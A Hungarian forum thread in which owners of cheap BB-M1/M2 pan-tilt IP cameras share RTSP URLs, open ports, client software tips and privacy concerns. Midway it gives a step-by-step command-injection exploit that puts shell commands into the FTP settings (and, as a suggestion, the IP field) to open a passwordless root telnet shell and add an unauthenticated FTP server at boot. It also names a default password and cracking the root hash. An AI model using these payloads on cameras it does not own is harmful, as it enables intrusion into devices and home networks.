BB-M2 RTSP címek:

HD stream:
RTSP://192.168.x.x:10554/TCP/av0_0

VGA stream:
RTSP://192.168.x.x:10554/TCP/av0_1

Rögzít hangot, tud hangra riasztani és távolról rá lehet kiabálni a tolvajra a kamera hangszórójával. Különösebben nem használom egyelőre semmi fontosra, ablakba ki van téve az egyik. Észrevétlenül elrejteni elég nehéz, talán magasan szekrény tetején körbevenni limlomokkal vagy dobozba betenni és lyukat vágni rajta. Aksija nincs, de powerbankról is elmegy. A motorjai hallatszanak ha mozog és ha a fülemet mellé teszem, kicsit súg (hangszóró vagy valami elektronika). Az infra ledek szemből látszanak pirosan és amikor sötétre bekapcsolja őket, kattan egy elég hangosat (vagy inkább valami szűrőt tesz ilyenkor a szeme elé?), az M1-en ez automata, az M2-n ki lehet kapcsolni, akkor sötétben nem lát de nem kattan és nem világít. Ha fontos, lemérhetem a befoglaló dimenzióit mindegyiknek.
Nyitott portok M1-en: 23, 554, 5051, 5050, 8800, 8899. (az egyik portscan progitól az 554 után rebootol ) M2-n: 23, 81, 9600, 10080, 10554. (mindegyik idle állapotban, amikor nem streamel sehova).
Hogy a kínai nézi-e? Ha NAT mögött van és upnp-vel nem kér port továbbítást, akkor elvileg nem. Ha magam beforwardolom valamelyik portját hogy kintről is nézhessem és annak van valami titkos admin jelszava is, ami tőlem független, akkor nézheti. Nem is a nézés a gond igazából ha nem a fürdőszobába rakom, inkább hogy ezen keresztül a hálózatom többi gépére nem hoz-e be valami vírust. Talán nem...
Telnet: találtam neten user+pass párosokat, de egyikkel sem engedett be, telnetet bruteforceolni meg évekig tart.

Szia,

Nekem az 5040 is nyitva van M1-en (érdekes módon csak másodszorra találta meg a port scanner), de sajnos web interface nincs rajta (de tuti lehetne rá varázsolni, ha más, hasonló chipsetes kamerának van) ... Viszont sikerült belőnöm Tiny Cam Monitorral ([link]) csak sajnos ahogy írták is már, itt nem él a jelszavas védelem, szóval jobb csak lanról nézni és nem portot nyitni (ahogy te is írtad). Működik a mozgatás is. Beállítás:

Az ip értelemszerűen a kamera címe
Amit még hozzátennék a hsz-edhez biztonság szempontból, h érdemes manuálisan hálózatot adni neki és a gatewayt üresen hagyni, így a kamera nem lát ki a netre, szóval ha ő akarna nyitni egy connectiont kifelé, h küldje Pekingbe a felvételeket, az sem fog neki menni (kivéve, ha van benne pár alap cím beégetve amit a beállitás ellenére végigpróbál )

Szerk.: az xc3511 jelszót próbáltad? Egyébként nem feltétlen kell bruteforceolni a telnetet, kis szerencsével hozzá való firm updateból ki lehet nyerni a jelszót.

[ Szerkesztve ]

Az átjáróval kapcsolatban igazad van, manuális IP-beállításnál ha átjárót nem adsz meg, akkor a helyi hálózaton kívülre nem tud kommunikálni (nem hinném, hogy olyan funkció lenne benne hogy próbáljon kitalálni átjárót magának ha nincs, a backdoor módszereknek nem az a lényege, hogy minden kamera mindenáron hackelhető legyen, elég ha a több millióból pár ezret nem védenek le valószínűségi alapon).
Ezt a jelszót se fogadja el a telnet egyik kamerán sem, próbáltam root-tal meg admin-nal is. Az M1 androidos alkalmazása akar firmware-t frissíteni rajta, de nem sikerül (valamit kiabál a kamera amíg ki nem húzom a konnektorból), tehát lehet rajta és talán az alkalmazásnak van is firmware-je fájlban.
Egyetlen PC-s progit találtam végül amelyik mindkét kamerát játja, az iSpy, de az M1-et csak képpel manuálisan megadott rtsp url-lel. Kár, hogy ezt nem sikerült teljes ONVIF-kompatibilisre megoldaniuk. Az M2 beépített webes felülete is egészen kulturált, bár Firefox módban nem ad 720-as képet.

Szerintetek fehér/feketében kellene venni a kamerát? tudom, h ez egyéni ízlés, de van egyiknek-másiknak előnye?

Illetve el lehet érni a memoria kártyát ftp-n keresztül? A lényeg, h elég magasba szerelném fel és nem szeretném mindig ki be rakosgatni. Egy 32 GB kártya meddig elég? Lehet formázni/menteni kivétel nélkül? Lehet némítani, h semmilyen hangot ne adjon ki és semmilyen fénye se legyen?

[ Szerkesztve ]

sziasztok
nekem is m1 van. 360eyet használok hozzá, a kérdésem az lenne, beállítom hogy mozgásra figyelmeztessen, ez meg is történik,és jön ugye a kép amit készít.. de képet nem tölti be az app... csak mondjuk negyvenből egy esetben... illetve mozgásnál egy képet készít, nem lehet esetleg beállítani több készüljön? a videó működik, de ha valaki fogja a kamerát, és nem nézzünk egyből rá a riasztásnál sok hasznát nem vesszük... van ötlet arra miért nem jeleníti meg a készített képet?
köszi

Sikerült OnVif Device Managerrel is belőni az M1-et, megy a mozgatás is. Annyit kell neki mondani, h

http://192.168.x.x:8899

Jelszó nem kell, csak a HD stream megy.

A jobb-bal mozgás másnál is fordítva van?

[ Szerkesztve ]

tényleg, nekem is működik. a feljebb említett tinycam androidos app szintén elkezeli valamennyire, sőt, autodetect meg is találta. iSpy-ben is látszik a kép, bár a PTZ nem akar menni.
a bal-jobb nálam is minden programban alapból fordítva van az M1-nél

Nem telnetet kell bruteforceolni, megvan a hash, azt kellene.
M2 soros port:
[link]

Utána végig lehet menni a többi part-on is, a part2 hozzászólásaiban van a root hash is, illetve telnet exploit is.

Röviden:
A web interface-en be kell menni a beállításokba, ott az alarm service settings alatt van az ftp settings.
Az ftp server mezőbe be kell írni ezt:
$(killall telnetd)

Az FTP User mezőbe ezt:
$(telnetd -l /bin/sh)

Mentsük el a Set up gombbal, azután a Test gombot kell megnyomni. Ekkor kiír egy hibaüzenetet:
Test ... Failed
Can not connect to the server

Kész, csatlakozzunk telnet-el, jelszó nélküli root shellt fogunk kapni.
Gépeljük be a következő parancsot:
vi /system/init/ipcam.sh

Menjünk le a legalsó sorra, utána nyomjuk meg az o betűt. Ekkor alatta nyit egy új sort. Ide írjuk be a következőt:
/usr/bin/tcpsvd -vE 0.0.0.0 21 ftpd /mnt &

Nyomjuk meg egyszer az Esc gombot, utána írjuk be, hogy :x és nyomjunk entert. Ekkor elmenti a fájlt.
utána írjuk be, hogy
reboot
Nyomjunk egy entert, várjuk meg amíg újraindul a kamera. Ezután az sd kártya gyökerét elérjük ftp-n, név és jelszó nélkül.
Ha más porton akarjuk az ftp kapcsolatot akkor a 21 helyett be kell írni a kívánt portot. Ha más mappát akarunk ftp gyökérnek, akkor a /mnt helyére a kívánt elérési utat írjuk be. Az sd kártya a /mnt könyvtárba kerül mountolásra, ha valaki nem vágja a linuxot az hagyja így, mert ha beleturkál a rendszerbe és nem indul többet a kamera akkor lehet félretenni, semmi firmware/recovery firmware nem áll rendelkezésre hozzá.

Most már vissza lehet írni a normál ftp beállításokat. Ha megint szükség van a telnet elérésre, akkor ezt ismét meg lehet csinálni.

A weblap a /system/web/web.zip fájlban van, itt a /system/web mappában van még audio_cn.zip és audio_en.zip amiben a hangbemondások vannak.

A hash honnan van meg? M1-hez nincs meg véletlen?

Ha a telnetes trükköt megcsinálod, akkor egyszerűen megnézed a /etc/passwd fájlban.

Az M1-en ezek szerint nincs web interface, de az ftp beállításokba írt telnetes trükköt ki lehet próbálni, a pc-s programból vagy telefonról rá lehet indítani, ha van benne ftp teszt (nem tudom, mert M1-em nincs). Ezután telnet, és szintén /etc/passwd.

Jah, csak hova írod be, web nincs, 21-es port is zárva... Azon agyalok, h azt kéne megnézni esetleg, h a 360eye milyen porton töltené fel a fw-t, hátha esetleg azon át lehetne bűvészkedni vmit.

[ Szerkesztve ]

A mobilos appban nincs ftp beállítás? Vagy a pc kliensben? Nincs valami ilyesmi? [link]
Én nem tudom kipróbálni kamera nélkül a pc szoftverében mert hozzá kéne adni a kamerát, de az M1 szoftvere nem viszi az M2-t. De az alsó sorban mintha lenne egy csavarkulcsos ikon: [link]

az M1 az M2-höz képest föld és ég, vagy hogy lehetne fordítva mondani, az M1 szoftverei rettentő trógerek, alig van 2-3 opció. M2 ftp-z, emailt küld, állíthatom hogy hangra alert, mozgásra alert, M1-ben van pár on-off opció és ennyi, se ftp, se email, semmi. alul a villáskulcs ikonra ha rákattintok, fölötte megjelenik egy egysoros, szöveg nélküli helyi menü, ha rákattintok az egy üres sorára, akkor eltűnik, ennyi

Sziasztok, 2 db M1-esem ma érkezett meg, egész jól működtek, amíg az egyiknek a szoftverjét nem frissítettem az androidos appon keresztül. Azóta az a kamera sokkal lassabban reagál minden parancsra (pl. forgatás), ha HD-ra váltok, lefagy a program... Az egész sokkal bizonytalanabbul működik, mint a frissítés nélküli változat.
Szerintetek vissza lehet rá valahogy varázsolni az eredeti firmware-t?

Akkor tényleg módosított firmware update csomaggal lehetne behatolni valahogy. Soros porton is kell a root jelszó, az nem megoldás.

Hozzá van adva a kamera és ki van választva?
A 360eye app-ban a Configure - Network settings vagy Alarm settings alatt sincs ftp upload beállítás? Vagy valami más ahol beírható szövegmező van?

Találtam képeket. Esetleg a fix ip-nél meg lehetne próbálni beírni az ip cím helyére:
$(killall telnetd ; telnetd -l /bin/sh)
és leokézni, hátha enged szöveget beírni és benyalja a parancsot.
Azután kipróbálni a telnetet.

Sziasztok!

De örülök, hogy rátaláltam erre a topikra!
És ez a telnet exploit fantasztikus!!!

Nekem tegnap jött meg az M2-s kamerám és egy hatalmasat csalódtam, mert nem hajlandó rejtett SSID-vel fentmaradni a wifin! Nálam otthon rejtett az SSID, tudom, hogy nem sokat ér ha valaki ki akarja találni, de ezen akkor sem akarok változtatni.

Ha publikusra változtatom, akkor azonnal felmegy az M2 a wifire, ha visszarakom rejtettre, akkor meg elveszti a kapcsolatot és nem tud visszalépni rá.

Kicsit játszottam a linuxos rendszerében, és a következőkre jöttem rá.
Egy wpa_supplicant nevű alkalmazás fut rajta, ami a wifi csatlakozásért felelős, ez ott van a process listában:
wpa_supplicant -B -Dwext -iwlan0 -c /tmp/wpa_supplicant.conf

És az SSID-t meg a wifi jelszót ebből a fájlból olvassa ki: /tmp/wpa_supplicant.conf

Ez a fájl így néz ki:
ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
network={
ssid="mywifissid"
psk="mywifipsk"
}

A második sorban az ap_scan a lényeg, azt olvastam, hogy elvileg az 1-es lrték azt jelenti, hogy publikus SSID-re csatlakozzon, a 2-es pedig azt, hogy rejtett SSID-re.

Szóval valahogy át kellene írni rendszerszinten ezt a sort, arra, hogy ap_scan=2

Ezt szerintetek hogy tudnám megtenni?

Ha közvetlen szerkesztem a /tmp/wpa_supplicant.conf fájlt, annak természetesen nincs semmi azonnali hatása és a következő reboot után el is felejti.
Vajon boot során hogyan, mi alapján generálódik le ez fájl a /tmp-ben? Szóval mit kellene megváltozatni, hogy már a megfelelő 2-es értékkel jönnön létre ez a fájl és az alapján hozza létre a wifi kapcsolatot?